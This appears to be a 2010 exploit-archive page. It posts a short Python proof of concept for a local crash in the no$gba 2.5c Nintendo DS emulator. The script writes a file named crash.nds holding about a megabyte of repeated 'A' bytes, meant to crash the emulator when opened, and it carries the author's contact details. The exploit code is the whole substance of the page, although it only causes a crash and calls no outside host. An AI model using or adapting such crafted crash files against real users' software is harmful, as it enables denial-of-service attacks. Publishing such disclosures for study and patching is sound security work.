Home / os / winme

no$gba 2.5c (.nds) Local Crash Exploit

Posted on 21 March 2010

====================================== no$gba 2.5c (.nds) Local Crash Exploit ====================================== #!/usr/bin/env python #no$gba 2.5c (.nds) local crash #Software Link: http://nocash.emubase.de/no$gba-w.zip #Author: l3D #Site: http://xraysecurity.blogspot.com #IRC: irc://irc.nix.co.il #Email: pupipup33@gmail.com bad=file('crash.nds', 'w') bad.write('A'*0x100000) bad.close() # Inj3ct0r.com [2010-03-21]

 

TOP